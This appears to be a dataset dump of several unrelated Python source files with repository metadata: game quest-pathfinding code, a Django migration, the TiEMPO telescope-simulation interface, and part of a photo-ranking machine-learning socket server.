def setTargetArea(self, targetUid=''):
self.targetAreaUid = targetUid
def getTargetArea(self):
return self.targetAreaUid
def getNodeSizes(self):
return self.nodeSizes
def getNearOffset(self):
return self.nearOffset
def getNearVis(self):
return self.nearVis
@staticmethod
def getNullStep():
if QuestStep.NullStep:
pass
else:
QuestStep.NullStep = QuestStep(0, 0, 0)
return QuestStep.NullStep
def showIndicator(self):
targetLocation = self.getTargetArea()
parentObj = localAvatar.getParentObj()
if config.GetBool('dynamic-rayoflight-area-only', True) and parentObj and hasattr(parentObj, 'uniqueId') and parentObj.uniqueId == targetLocation:
return False
return True
class QuestPath:
__module__ = __name__
notify = DirectNotifyGlobal.directNotify.newCategory('QuestPath')
def __init__(self, air):
self.world = None
self.posH = (0, 0, 0, 0)
self.questSteps = {}
self.islandStep = None
self.islandDoId = None
self.preferredStepUids = set()
if __dev__:
pass
return
def delete(self):
self.islandDoId = None
self.islandStep = None
self.questSteps = {}
self.world = None
return
def setWorld(self, world):
self.world = world
def setQuestStepPosH(self, x, y, z, h):
self.posH = (
x, y, z, h)
def getIslandDoId(self):
if self.islandDoId:
pass
else:
if self._isIsland():
self.islandDoId = self.doId
return self.islandDoId
@report(types=['frameCount', 'args'], dConfigParam='quest-indicator')
def getQuestStepIsland(self):
if self._isIsland():
return QuestStep(0, self.getIslandDoId(), self._getQuestStepType())
@report(types=['frameCount', 'args'], dConfigParam='quest-indicator')
def getQuestStep(self, questDestUid, islandDoId, avId):
if not self.getIslandDoId():
self.getExitIslandStep()
questIslandDoId = islandDoId
questIsland = None
isPrivate = False
goalType = questDestUid.getType()
if goalType != QuestGoal.Type_Custom:
if islandDoId == None:
questIslandDoId = self.world.getObjectIslandDoId(questDestUid)
isPrivate = self.world.getObjectIsPrivate(questDestUid)
if not questIslandDoId:
return
questIsland = self.air.doId2do.get(questIslandDoId)
if not questIsland:
return
islandObj = (questIslandDoId or goalType == QuestGoal.Type_Custom) and (self.getIslandDoId() == questIslandDoId or goalType == QuestGoal.Type_Custom) and not questDestUid.getTargetTypeOnlyOnOcean() and self.getIsland()
if islandObj:
if goalType == QuestGoal.Type_Custom:
if islandObj.notHasQuestGoal(questDestUid):
return QuestStep.NullStep
islandSearchResult = self.getIntoIslandStep(questDestUid, isPrivate, avId)
if islandObj:
if islandSearchResult == None or islandSearchResult == QuestStep.NullStep:
islandObj.setNotHasQuestGoal(questDestUid)
else:
searchArea = self._checkNeedDinghyStep(avId, islandSearchResult.getOriginDoId())
if searchArea:
return self._getLocalDinghy(avId, questDestUid, searchArea=searchArea)
return islandSearchResult
else:
step = self.getExitIslandStep()
if step:
return step
else:
dinghyStep = self._getLocalDinghy(avId, questDestUid)
if dinghyStep:
return dinghyStep
else:
destIsland = self.air.doId2do.get(questIslandDoId)
if destIsland:
return QuestStep(self.doId, questIslandDoId, questIsland._getQuestStepType())
return
def _checkNeedDinghyStep(self, avId, goalOriginId):
avObj = self.air.doId2do.get(avId)
if avObj:
avParent = avObj.getParentObj()
avIsland = avParent.getIsland()
if avParent is avIsland:
if goalOriginId != avParent.doId:
return avParent
return
def _getLocalDinghy(self, avId, questDestUid, searchArea=None):
avObj = self.air.doId2do.get(avId)
if avObj:
avZone = avObj.zoneId
if searchArea == None:
searchArea = self
dinghyId = self.world.queryGoalByObjectType(QuestGoal.GOAL_TYPE_DINGHY, avObj, questDestUid, searchArea)
dinghyObj = self.air.doId2do.get(dinghyId)
if dinghyObj:
dinghyPos = dinghyObj.getPos(searchArea)
return QuestStep(searchArea.doId, dinghyId, dinghyObj._getQuestStepType(), posH=(dinghyPos[0], dinghyPos[1], dinghyPos[2], dinghyObj.getH()), islandUid=self.getUniqueId())
return
@report(types=['frameCount', 'args'], dConfigParam='quest-indicator')
def getExitIslandStep(self):
if self._isIsland() or self._isShip():
return
if not self.islandStep:
self._getIslandPath([], [], {})
returnStep = copy.copy(self.islandStep)
return returnStep
@report(types=['frameCount', 'args'], dConfigParam='quest-indicator')
def getIntoIslandStep(self, questDestUid, isPrivate, avId=None):
questStep = self.questSteps.get(questDestUid)
if not questStep or config.GetBool('cache-quest-step', 1) == 0:
path = self._getQuestPath(questDestUid, isPrivate, [], [], {}, avId)
if path:
targetAreaUid = self.air.doId2do[path[len(path) - 1]].getParentObj().uniqueId
questStep = self.questSteps.get(questDestUid)
if questStep:
questStep.setTargetArea(targetAreaUid)
if questDestUid.getType() == QuestGoal.Type_Custom:
self.questSteps.pop(questDestUid, None)
return questStep
def getOntoOceanStep(self, questDestUid, avId):
questIds = self.world.queryGoal(questDestUid, self, avId)
for questDoId, questUid in questIds:
questGoalObj = self.air.doId2do.get(questDoId)
if questGoalObj:
questDest = QuestStep(self.world.worldGrid.doId, questDoId, questGoalObj._getQuestStepType(), questGoalObj._getQuestStepPosH())
avObj = self.air.doId2do.get(avId)
if avObj:
avObj.setQuestGoalDoId(questGoalObj)
return questDest
return QuestStep.NullStep
def _getExitLinkDoIds(self, questGoalUid):
if __dev__:
pass
return []
def _getQuestStepType(self):
if __dev__:
pass
return 0
def _isIsland(self):
if __dev__:
pass
return False
def _isShip(self):
return False
def _getQuestStepPosH(self):
return self.posH
@report(types=['frameCount', 'args'], dConfigParam='quest-indicator')
def _getIslandPath(self, alreadyVisited, needToVisit, pathDict):
islandPath = []
needToStore = False
if not islandPath:
if self._isIsland():
islandPath = alreadyVisited + [self.doId]
if islandPath:
finalPath = [
islandPath[-1]]
next = pathDict.get(finalPath[-1])
while next:
finalPath.append(next)
next = pathDict.get(finalPath[-1])
finalPath.reverse()
else:
exitLinks = [ linkDoId for linkDoId in self._getExitLinkDoIds(None) if linkDoId not in alreadyVisited if linkDoId not in needToVisit ]
for link in exitLinks:
pathDict[link] = self.doId
needToVisit += exitLinks
if needToVisit:
nextDoId = needToVisit.pop(0)
nextStep = self.air.doId2do[nextDoId]
finalPath = nextStep._getIslandPath(alreadyVisited + [self.doId], needToVisit, pathDict)
needToStore = True
else:
finalPath = []
if needToStore and self.doId in finalPath:
self._storeIslandStep(finalPath)
return finalPath
@report(types=['frameCount', 'args'], dConfigParam='quest-indicator')
def _storeIslandStep(self, path):
stepDoId = path[path.index(self.doId) + 1]
step = self.air.doId2do[stepDoId]
if __dev__:
pass
self.islandStep = QuestStep(self.doId, stepDoId, step._getQuestStepType(), step._getQuestStepPosH())
self.islandDoId = step.islandDoId
@report(types=['frameCount', 'args'], dConfigParam='quest-indicator')
def _getQuestPath(self, questDestUid, isPrivate, alreadyVisited, needToVisit, pathDict, avId):
questDest = None
questPath = []
needToStore = False
if not isPrivate:
if not questPath:
questIds = self.world.queryGoal(questDestUid, self, avId)
for questDoId, questUid in questIds:
questGoalObj = self.air.doId2do.get(questDoId)
if questGoalObj:
if questGoalObj.getParentObj() is self or questGoalObj is self:
if questDoId != self.doId:
pathDict.setdefault(questDoId, self.doId)
newIds = [self.doId, questDoId]
else:
newIds = [
self.doId]
questPath = alreadyVisited + [self.doId, questDoId]
questDest = QuestStep(self.doId, questDoId, questGoalObj._getQuestStepType(), questGoalObj._getQuestStepPosH())
needToStore = True
avObj = self.air.doId2do.get(avId)
if avObj:
avObj.setQuestGoalDoId(questGoalObj)
break
else:
if questDoId != None:
pass
if questDestUid.getType() != QuestGoal.Type_Custom and questUid:
try:
objInfo = self.air.worldCreator.getObjectDataFromFileByUid(questUid, self.getFileName())
if objInfo:
if objInfo.get('Type') == 'Dinghy':
pos = objInfo['Pos']
hpr = objInfo['Hpr']
questPath = alreadyVisited + [self.doId]
questDest = QuestStep(self.doId, 0, QuestStep.STQuestNode, (
pos[0], pos[1], pos[2], hpr[0]))
needToStore = True
break
elif objInfo.get('Type') == 'Quest Node':
pos = objInfo['Pos']
nodePos = None
parentUid = self.air.worldCreator.getObjectDataFromFileByUid(questUid, self.getFileName(), getParentUid=True)
if parentUid:
parentObj = self.world.uidMgr.justGetMeMeObject(parentUid)
if parentObj:
tform = TransformState.makePosHpr(parentObj.getPos(self), parentObj.getHpr(self))
nodePos = tform.getMat().xformPoint(pos)
if nodePos == None:
nodePos = pos
hpr = objInfo['Hpr']
at = int(float(objInfo['At']))
near = int(float(objInfo['Near']))
nearOffset = (int(objInfo['NearOffsetX']), int(objInfo['NearOffsetY']), int(objInfo['NearOffsetZ']))
nearVis = (
int(objInfo['NearVisX']), int(objInfo['NearVisY']), int(objInfo['NearVisZ']))
questPath = alreadyVisited + [self.doId]
questDest = QuestStep(self.doId, 0, QuestStep.STQuestNode, (
nodePos[0], nodePos[1], nodePos[2], hpr[0]), nodeSizes=[at, near], nearOffset=nearOffset, nearVis=nearVis)
needToStore = True
break
elif objInfo.get('Type') == 'Object Spawn Node':
pos = objInfo['Pos']
hpr = objInfo['Hpr']
questPath = alreadyVisited + [self.doId]
questDest = QuestStep(self.doId, 0, QuestStep.STArea, (
pos[0], pos[1], pos[2], hpr[0]))
needToStore = True
break
except AttributeError:
pass
else:
if not questPath:
if self.air.worldCreator.isObjectDefined(questDestUid.getGoalIds(all=False), self.world.getFileName() + '.py'):
questPath = alreadyVisited + [self.doId]
needToStore = False
if questPath:
finalPath = [
questPath[-1]]
next = pathDict.get(finalPath[-1])
while next:
finalPath.append(next)
next = pathDict.get(finalPath[-1])
finalPath.reverse()
else:
exitLinks = [ linkDoId for linkDoId in self._getExitLinkDoIds(questDestUid.getGoalIds(all=False)) if linkDoId not in alreadyVisited if linkDoId not in needToVisit ]
for link in exitLinks:
pathDict[link] = self.doId
needToVisit += exitLinks
if needToVisit:
nextDoId = needToVisit.pop(0)
nextStep = self.air.doId2do[nextDoId]
finalPath = nextStep._getQuestPath(questDestUid, isPrivate, alreadyVisited + [self.doId], needToVisit, pathDict, avId)
if questDestUid.getType() == QuestGoal.Type_Custom:
nextStep.questSteps.pop(questDestUid, None)
needToStore = True
else:
finalPath = []
needToStore = True
if needToStore and self.doId in finalPath:
self._storeQuestStep(finalPath, questDestUid, questDest)
if not finalPath:
self._storeQuestStep(finalPath, questDestUid, questStep=QuestStep.getNullStep())
return finalPath
@report(types=['frameCount', 'args'], dConfigParam='quest-indicator')
def _storeQuestStep(self, path, questDestUid, questStep=None):
if not questStep:
stepDoId = path[path.index(self.doId) + 1]
step = self.air.doId2do[stepDoId]
if __dev__:
pass
questStep = QuestStep(self.doId, stepDoId, step._getQuestStepType(), step._getQuestStepPosH())
self.questSteps[questDestUid] = questStep
def setAsPreferredStepFor(self, questGoalUid):
self.preferredStepUids.add(questGoalUid)
def isPreferredStep(self, questGoalUid):
return questGoalUid in self.preferredStepUids | 42.165247 | 455 | 0.562725 |
6add655847bdde2f01f155a6d99298fe21993e1a | 561 | py | Python | inventories/migrations/0016_auto_20200531_0048.py | amado-developer/ReadHub-RestfulAPI | 8d8b445c4a84810d52bbf78a2593e0b48351590c | [
"MIT"
] | null | null | null | inventories/migrations/0016_auto_20200531_0048.py | amado-developer/ReadHub-RestfulAPI | 8d8b445c4a84810d52bbf78a2593e0b48351590c | [
"MIT"
] | 7 | 2021-03-19T03:09:53.000Z | 2022-01-13T02:48:44.000Z | inventories/migrations/0016_auto_20200531_0048.py | amado-developer/ReadHub-RestfulAPI | 8d8b445c4a84810d52bbf78a2593e0b48351590c | [
"MIT"
] | null | null | null | # Generated by Django 3.0.6 on 2020-05-31 00:48
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('digital_books', '0007_auto_20200527_2137'),
('inventories', '0015_auto_20200530_0500'),
]
operations = [
migrations.AlterField(
model_name='inventory',
name='digital_book',
field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to='digital_books.Digital_Book'),
),
]
| 26.714286 | 125 | 0.659537 |
f25ea43b5f1322a214f8addefbb58d7f324a6433 | 19,396 | py | Python | tiempo_deshima/interface.py | Stefanie-B/DESHIMAmodel | bcb695ea64078f2a61cf9495e18909e29e1f2a98 | [
"MIT"
] | 2 | 2020-09-05T15:22:32.000Z | 2020-10-01T04:52:39.000Z | tiempo_deshima/interface.py | deshima-dev/tiempo_deshima | bcb695ea64078f2a61cf9495e18909e29e1f2a98 | [
"MIT"
] | 6 | 2020-10-30T17:13:07.000Z | 2021-07-28T12:13:15.000Z | tiempo_deshima/interface.py | Stefanie-B/DESHIMAmodel | bcb695ea64078f2a61cf9495e18909e29e1f2a98 | [
"MIT"
] | null | null | null | """
This module allows users to execute funtioncs in signal_transmitter, while providing default values so not all values need to be set manually.
"""
import numpy as np
#import signal_transmitter as st
#import DESHIMA.MKID.filterbank as ft
from pathlib import Path
from . import signal_transmitter as st
from .DESHIMA.MKID import filterbank as ft
import os
def calcMaxObsTime(dictionary):
"""
Calculates the maximum observing time, using the number of gridpoints in
one atmosphere strip, the gridwidth, the number of atmosphere strips and the
windspeed
"""
# maximum time
# every strip has 32768 x-values
max_obs_time = (dictionary['x_length_strip'] - 3 * dictionary['separation'])* \
dictionary['max_num_strips']*dictionary['grid'] \
/dictionary['windspeed']
return max_obs_time
def convert_folder(folder):
folder = folder.strip('/')
folder = folder.strip('\\')
sourcepath = Path.cwd()
while folder.startswith('.'):
folder = folder.strip('.')
folder = folder.strip('/')
folder = folder.strip('\\')
sourcepath = sourcepath.parent
sourcepath = sourcepath.joinpath(folder)
return sourcepath
def new_filterbank(dictionary):
"""
Parameters
----------
dictionary : dict
Dictionary obtained from get_dictionary() with the same keywords as run_tiempo() executed after this function. Input_dictionary in that function must be set to 'manual' or 'path'
Returns
-------
None.
Must be executed when the filter properties are changed.
"""
if dictionary['savefolder'] == None:
dictionary['savefolder'] = Path.cwd().joinpath('output_TiEMPO')
else:
dictionary['savefolder'] = convert_folder(dictionary['savefolder'])
dictionary['sourcefolder'] = convert_folder(dictionary['sourcefolder'])
length_EL_vector = 25
length_pwv_vector = 25
#test one value
pwv_vector = np.logspace(0., 0., length_pwv_vector)
EL_vector = np.linspace(60., 60., length_EL_vector)
#make interpolation curves
pwv_vector = np.logspace(-1, 0.35, length_pwv_vector)
EL_vector = np.linspace(20., 90., length_EL_vector)
ft1 = ft.filterbank(dictionary['F_min'], dictionary['spec_res'], dictionary['num_filters'], dictionary['f_spacing'], dictionary['num_bins'], dictionary['D1'])
ft1.save_TP_data(EL_vector, pwv_vector)
ft1.fit_TPpwvEL_curve(pwv_vector, EL_vector)
ft1.save_etaF_data(pwv_vector, 90.)
def get_dictionary(input_dictionary, prefix_atm_data, sourcefolder, save_name_data, savefolder, save_P=True, save_T=True, n_jobs = 30, n_batches = 8,\
obs_time = 2., grid = .2, x_length_strip = 65536., separation = 1.1326,\
galaxy_on = True, luminosity = 13.7, redshift = 4.43, linewidth = 600, \
EL = 60, EL_vec = None, max_num_strips = 32, pwv_0 = 1., F_min = 220e9, \
num_bins = 1500, spec_res = 500, f_spacing = 500, \
num_filters = 347, beam_radius = 5., useDESIM = 1, \
inclAtmosphere = 1, windspeed = 10, D1 = 0, \
dictionary_name = ''):
"""
Parameters
----------
input_dictionary : string
'deshima_1', 'deshima_2', 'manual' or 'path'. Determines where the input values of keywords F_min thru come from: either standard values for DESHIMA, manual entry from the keywords or from a txt file in the order of keywords obs_time thru D1.
prefix_atm_data : string
The prefix of the output of ARIS that is being used by the TiEMPO
sourcefolder : string
Folder where ARIS data used by the model is saved, relative to the current working directory. A parent folder can be specified by prefixing with '../', '..\\', './' or '.\\'
save_name_data : string
Prefix of the output of TiEMPO
savefolder : string
Folder where the output of the model will be saved relative to the current working directory. A parent folder can be specified by prefixing with '../', '..\\', './' or '.\\'
save_P : bool
determines whether the power in Watts is saved as an output. Default is True
save_T : bool
determines whether the sky temperature in Kelvins is saved as an output. Default is True.
n_jobs : int
maximum number of concurrently running jobs (size of thread-pool). -1 means all CPUs are used.
n_batches : int
number of batches the entire observation is divided up into. Default is 8.
obs_time : float, optional
Length of the observation in seconds. The default is 2..
grid : float, optional
The width of a grid square in the atmosphere map in meters. The default is .2.
x_length_strip : int, optional
The length of one atmosphere strip in the x direction in number of gridpoints (NOT METERS). The default is 65536.
separation : float, optional
Separation between two chop positions in m, assuming that the atmosphere is at 1km height. Default is 1.1326 (this corresponds to 116.8 arcsec).
galaxy_on : bool, optional
Determines whether there is a galaxy in position 2. The default is True.
luminosity : float, optional
Luminosity if the galaxy in log(L_fir [L_sol]). The default is 13.7.
redshift : float, optional
The redshift of the galaxy. The default is 4.43.
linewidth : float, optional
Width of the spectral lines in the galaxy spectrum in km/s. The default is 600.
EL : float, optional
Elevation of the telescope in degrees. The default is 60.
EL_vec: vector of floats, optional
If this parameter is set, it allows to specify the elevation of the telescope in degrees per timestep, for example in the case of tracking a target. Vector must have a length of 160Hz * obs_time.
max_num_strips : int, optional
Number of atmosphere strips that are saved in the ARIS output folder. The default is 32.
pwv_0 : float, optional
Baseline value of precipitable water vapor that is added to the d(pwv) from ARIS in mm. The default is 1.
F_min : float, optional
Lowest center frequency of all the MKIDs. The default is 220e9.
num_bins : int, optional
determines the amount of bins used in the simulation of the galaxy spectrum. The default is 1500.
spec_res : float, optional
Spectral resolution. The default is 500.
f_spacing : float, optional
spacing between center frequencies = F/dF (mean). The default is 500.
num_filters : int, optional
Number of filters in the filterbank. The default is 347.
beam_radius : float, optional
Radius of the Gaussian beam in meters. The default is 5.
useDESIM : int, optional
1 or 0. Determines whether the simple atmospheric model is used (0) or the more sophisticated desim simulation (1). The default is 1.
inclAtmosphere : int, optional
1 or 0. Determines whether the atmosphere is included in the simulation. The default is 1 (yes).
windspeed: float, optional
Sped of the wind in meters/second. The default is 10.
D1 : int, optional
1 or 0. Determines whether DESHIMA 1.0 is simulated. The default is 0.
dictionary_name : string, optional
name of a txt file in which the values of optional keywords are saved. prefix_atm_data, sourcefolder, save_name_data, savefolder, n_jobs, save_P, save_T and EL_vec must still be set outside the file. Only used when input_dictionary is set to 'path'. The default is ''. Order of the entries in the txt file must be: F_min, num_bins, spec_res, f_spacing, num_filters, beam_radius, useDESIM, inclAtmosphere, D1, time, grid, x_length_strip, galaxy_on, luminosity, redshift, linewidth, EL, max_num_strips, pwv_0, windspeed, n_batches.
Returns
-------
dictionary : dict
Dictionary with the above keywords.
"""
if input_dictionary == 'deshima_1':
dictionary = {
'F_min': 332e9,
'num_bins': 1500,
'spec_res': 300,
'f_spacing': 380,
'num_filters': 49,
'beam_radius': 5.,
'useDESIM': 1,
'inclAtmosphere': 1,
'D1': 1
}
elif input_dictionary == 'deshima_2':
dictionary = {
'F_min': 220e9,
'num_bins': 1500,
'spec_res': 500,
'f_spacing': 500,
'num_filters': 347,
'beam_radius': 5.,
'useDESIM': 1,
'inclAtmosphere': 1,
'D1': 0
}
elif input_dictionary == 'manual':
dictionary = {
'F_min': F_min,
'num_bins': num_bins,
'spec_res': spec_res,
'f_spacing': f_spacing,
'num_filters': num_filters,
'beam_radius': beam_radius,
'useDESIM': useDESIM,
'inclAtmosphere': inclAtmosphere,
'D1': D1
}
else:
d = np.loadtxt(os.getcwd()+'\\' + dictionary_name, comments='#')
dictionary = {
'F_min': d[0],
'num_bins': d[1],
'spec_res': d[2],
'f_spacing': d[3],
'num_filters': d[4],
'beam_radius': d[5],
'useDESIM': d[6],
'inclAtmosphere': d[7],
'D1': d[8],
'time': d[9],
'grid':d[10],
'x_length_strip':d[11],
'separation':d[12],
'galaxy_on':d[13],
'luminosity':d[14],
'redshift':d[15],
'linewidth':d[16],
'EL':d[17],
'max_num_strips':d[18],
'pwv_0':d[19],
'windspeed':d[20],
'n_batches':d[21],
'save_P': save_P,
'save_T': save_T,
'prefix_atm_data':prefix_atm_data,
'save_name_data':save_name_data,
'n_jobs':n_jobs,
'savefolder' : savefolder,
'sourcefolder' : sourcefolder,
'EL_vec': EL_vec
}
return dictionary
dictionary['n_jobs'] = int(n_jobs)
dictionary['time'] = obs_time
dictionary['prefix_atm_data']= prefix_atm_data
dictionary['grid']= grid
dictionary['x_length_strip']= float(x_length_strip)
dictionary['galaxy_on'] = galaxy_on
dictionary['luminosity']= luminosity
dictionary['redshift']= redshift
dictionary['linewidth']= linewidth
dictionary['EL']= EL
dictionary['max_num_strips']= max_num_strips
dictionary['save_name_data']= save_name_data
dictionary['pwv_0'] = pwv_0
dictionary['windspeed'] = windspeed
dictionary['savefolder'] = savefolder
dictionary['sourcefolder'] = sourcefolder
dictionary['EL_vec'] = EL_vec
dictionary['save_P'] = save_P
dictionary['save_T'] = save_T
dictionary['n_batches'] = int(n_batches)
dictionary['separation'] = separation
return dictionary
def run_tiempo(input_dictionary, prefix_atm_data, sourcefolder, save_name_data, savefolder = None, save_P=True, save_T=True, n_jobs = 30, n_batches = 8,\
obs_time = 3600., grid = .2, x_length_strip = 65536., separation = 1.1326,\
galaxy_on = True, luminosity = 13.7, redshift = 4.43, linewidth = 600, \
EL = 60, EL_vec=None, max_num_strips = 32, pwv_0 = 1., F_min = 220e9, \
num_bins = 1500, spec_res = 500, f_spacing = 500, \
num_filters = 347, beam_radius = 5., useDESIM = 1, \
inclAtmosphere = 1, windspeed = 10, D1 = 0, dictionary_name = ''):
"""
Parameters
----------
input_dictionary : string
'deshima_1', 'deshima_2', 'manual' or 'path'. Determines where the input values of keywords F_min thru come from: either standard values for DESHIMA, manual entry from the keywords or from a txt file.
prefix_atm_data : string
The prefix of the output of ARIS that is being used by the TiEMPO
sourcefolder : string
Folder where ARIS data used by the model is saved, relative to the current working directory. A parent folder can be specified by prefixing with '../', '..\\', './' or '.\\'
save_name_data : string
Prefix of the output of TiEMPO
savefolder : string
Folder where the output of the model will be saved relative to the current working directory. A parent folder can be specified by prefixing with '../', '..\\', './' or '.\\'
save_P : bool
determines whether the power in Watts is saved as an output. Default is True
save_T : bool
determines whether the sky temperature in Kelvins is saved as an output. Default is True.
n_jobs : int
maximum number of concurrently running jobs (size of thread-pool). -1 means all CPUs are used.
n_batches : int
number of batches the entire observation is divided up into. Default is 8.
obs_time : float, optional
Length of the observation in seconds. The default is 2.0.
grid : float, optional
The width of a grid square in the atmosphere map in meters. The default is .2.
x_length_strip : int, optional
The length of one atmosphere strip in the x direction in number of gridpoints (NOT METERS). The default is 65536.
separation : float, optional
Separation between two chop positions in m, assuming that the atmosphere is at 1km height. Default is 1.1326 (this corresponds to 116.8 arcsec).
galaxy_on : bool, optional
Determines whether there is a galaxy in position 2. T The default is True.
luminosity : float, optional
Luminosity if the galaxy in log(L_fir [L_sol]). The default is 13.7.
redshift : float, optional
The redshift of the galaxy. The default is 4.43.
linewidth : float, optional
Width of the spectral lines in the galaxy spectrum in km/s. The default is 600.
EL : float, optional
Elevation of the telescope in degrees. The default is 60.
EL_vec: vector of floats, optional
If this parameter is set, it allows to specify the elevation of the telescope in degrees per timestep, for example in the case of tracking a target. Vector must have a length of 160Hz * obs_time.
max_num_strips : int, optional
Number of atmosphere strips that are saved in the ARIS output folder. The default is 32.
pwv_0 : float, optional
Baseline value of precipitable water vapor that is added to the d(pwv) from ARIS in mm. The default is 1.
F_min : float, optional
Lowest center frequency of all the MKIDs. The default is 220e9.
num_bins : int, optional
determines the amount of bins used in the simulation of the galaxy spectrum. The default is 1500.
spec_res : float, optional
Spectral resolution. The default is 500.
f_spacing : float, optional
spacing between center frequencies = F/dF (mean). The default is 500.
num_filters : int, optional
Number of filters in the filterbank. The default is 347.
beam_radius : float, optional
Radius of the Gaussian beam in meters. The default is 5.
useDESIM : int, optional
1 or 0. Determines whether the simple atmospheric model is used (0) or the more sophisticated desim simulation (1). The default is 1.
inclAtmosphere : int, optional
1 or 0.Determines whether the simple atmospheric model is used (0) or the more sophisticated desim simulation (1). The default is 1 (yes).
windspeed: float, optional
Sped of the wind in meters/second. The default is 10.
D1 : int, optional
1 or 0. Determines whether DESHIMA 1.0 is simulated. The default is 0.
dictionary_name : string, optional
name of a txt file in which the values of optional keywords are saved. prefix_atm_data, sourcefolder, save_name_data, savefolder, n_jobs, save_P, save_T and EL_vec must still be set outside the file. Only used when input_dictionary is set to 'path'. The default is ''. Order of the entries in the txt file must be: F_min, num_bins, spec_res, f_spacing, num_filters, beam_radius, useDESIM, inclAtmosphere, D1, time, grid, x_length_strip, luminosity, redshift, linewidth, EL, max_num_strips, pwv_0, windspeed, n_batches.
Returns
-------
time_vector: array of floats
Moments in time at which the signal is calculated.
center_freq: array of floats
Center frequencies of the MKIDs
Saves '<cwd>/output_TiEMPO/<save_name_data>+P_X.npy' OR '<savefolder>/<save_name_data>+P_X.npy': numpy array of floats
array of the power values of the signal in Watts. Dimensions are: [5 x #filters x #timesamples], as 5 pwv values are taken for each timesample
Saves '<cwd>/output_TiEMPO/<save_name_data>+T_X.npy' OR '<savefolder>/<save_name_data>+T_X.npy': numpy array of floats
array of the power values of the signal converted to sky temperature in Kelvins. Dimensions are: [5 x #filters x #timesamples], as 5 pwv values are taken for each timesample
"""
dictionary = get_dictionary(input_dictionary, prefix_atm_data, sourcefolder,\
save_name_data, savefolder, save_P, save_T, n_jobs, n_batches, obs_time, grid, \
x_length_strip, separation, galaxy_on,luminosity, redshift, \
linewidth, EL, EL_vec, max_num_strips, pwv_0, F_min, \
num_bins, spec_res, f_spacing, num_filters, \
beam_radius, useDESIM, inclAtmosphere, \
windspeed, D1, dictionary_name)
if dictionary['savefolder'] == None:
dictionary['savefolder'] = Path.cwd().joinpath('output_TiEMPO')
else:
dictionary['savefolder'] = convert_folder(dictionary['savefolder'])
dictionary['sourcefolder'] = convert_folder(dictionary['sourcefolder'])
if round(dictionary['separation']/dictionary['grid']) != 1e-6*round(1e6*dictionary['separation']/dictionary['grid']):
raise ValueError('The separation is not an integer multiple of the ARIS grid size. Consider changing the separation to {:.5f} m or {:.5f} m instead of {} m'.format(dictionary['grid']*np.floor(dictionary['separation']/dictionary['grid']), dictionary['grid']*np.ceil(dictionary['separation']/dictionary['grid']), dictionary['separation']))
num_steps = dictionary['separation'] / (dictionary['windspeed']/160)
if round(num_steps) != num_steps:
raise ValueError('Separation is not an integer multiple of atmosphere distance per sample. Consider changing the windspeed to {} m/s or {} m/s instead of {} m/s'.format(dictionary['separation']*160/np.ceil(num_steps), dictionary['separation']*160/np.floor(num_steps), dictionary['windspeed']))
max_obs_time = calcMaxObsTime(dictionary)
if obs_time > max_obs_time:
raise ValueError('obs_time must be smaller than: ', max_obs_time)
if dictionary['n_jobs'] < 1:
raise ValueError('Please set a number of threads greater than or equal to 1 in n_jobs.')
if dictionary['n_batches'] < 1:
raise ValueError('Please set a number of signal batches greater than or equal to 1 in n_batches.')
st1 = st.signal_transmitter(dictionary)
[time_vector, center_freq] = st1.transmit_signal_DESIM_multf_atm()
return time_vector, center_freq | 52.421622 | 537 | 0.657352 |
222d9fdee9ee65ebc280e66218d1f4f7df620dc6 | 11,854 | py | Python | Server_and_client/ML_Server.py | tomercahal/Statispic | a15cd664fdecff82ff0ab425a9f51134525be0fa | [
"MIT"
] | 1 | 2020-04-02T09:19:36.000Z | 2020-04-02T09:19:36.000Z | Server_and_client/ML_Server.py | tomercahal/Statispic | a15cd664fdecff82ff0ab425a9f51134525be0fa | [
"MIT"
] | null | null | null | Server_and_client/ML_Server.py | tomercahal/Statispic | a15cd664fdecff82ff0ab425a9f51134525be0fa | [
"MIT"
] | null | null | null | #For the ML
#from keras.models import load_model
from tensorflow.keras.models import load_model
import numpy as np
# For the rest of the server
import socket
import threading
import sys
import zipfile
import os
import cv2 as cv
from cryptography.fernet import Fernet # Used to create a key, encrypt and decrypt messages
SEPARATOR = "<SEPARATOR>" # Used when delivering the file name and file size.
def load_images_for_trained_model(before_images_path, list_of_dirs):
"""This function is the same function used to manipulate the images to get them ready for prediction.
The function receives the path before the images names, and a list of just the basename of the images, for
example (photo1.jpg).After the server has the images from the user he will use this function in order
to prepare the images for prediction."""
print(list_of_dirs)
images = []
# intialize the images given and prepare them for prediction
for im_dir in list_of_dirs:
print(im_dir)
image = cv.imread(before_images_path + "/" + im_dir)
# cv.imshow('sample image', image) #for showing the image
# cv.waitKey(0)
image = cv.resize(image, (400, 400))
images.append(image)
return np.array(images)
class Server (object):
def __init__(self):
"""The constructor of the Server"""
self.IP = '127.0.0.1' # The IP of the server.
self.PORT = 220 # The chose port to have the connection on
self.users_allowed = sys.maxsize # This is the amount of users that are allowed to be logged in at the same time
self.sem = threading.Semaphore(self.users_allowed) # using semaphore in order to handle the threads
self.ML_model_location = "D:/Statispic/final-statispic_model.hdf5"
self.ML_model = load_model("D:/Statispic/final-statispic_model.hdf5") # Loading the ML model
self.server_file_extract_dir = "D:/Statispic/Server_and_client/thread"
self.encrypt_key_path = "D:/Statispic2/Server_and_client/key.key" # Where the key is located at
self.encryption_key = self.read_key() # Getting the encryption key from the key file
self.decryptor = Fernet(self.encryption_key) # Initializing the Fernet with the key
def read_key(self):
"""A function that reads the the key from the self.encrypt_key_path and returns it"""
with open(self.encrypt_key_path, "rb") as file:
return file.read() # Returning the key
def predict_on_images_and_send_result(self, client_sock, pic_dir):
"""This function will get the images np array, make the predictions on them.
Find the best image, return it to the user and release the thread."""
dirs_list = [] # This list will contain the directories of the images for prediction
for (dirpath, dirnames, filenames) in os.walk(pic_dir):
dirs_list.extend(filenames)
break
print("The images that the predictions are going to be on are:")
print(dirs_list)
images_ready_for_prediction = load_images_for_trained_model(pic_dir, dirs_list) # Getting the images ready for prediction
images_ready_for_prediction = images_ready_for_prediction / 255.0 # normalizing
prediction = self.ML_model.predict(images_ready_for_prediction) # Predicting the ratios for the images
prediction_mul_list = prediction.tolist()
prediction_list = [val for sublist in prediction_mul_list for val in sublist] # Using list comprehension
print(prediction_list)
for i in range(len(dirs_list)):
print("X(image dir)=%s, Predicted value=%s" % (dirs_list[i], prediction[i])) # Printing the predictions
best_image_dir = dirs_list[prediction_list.index(max(prediction_list))] # Super sick!!
print("The best image is: " + best_image_dir + " !!!!")
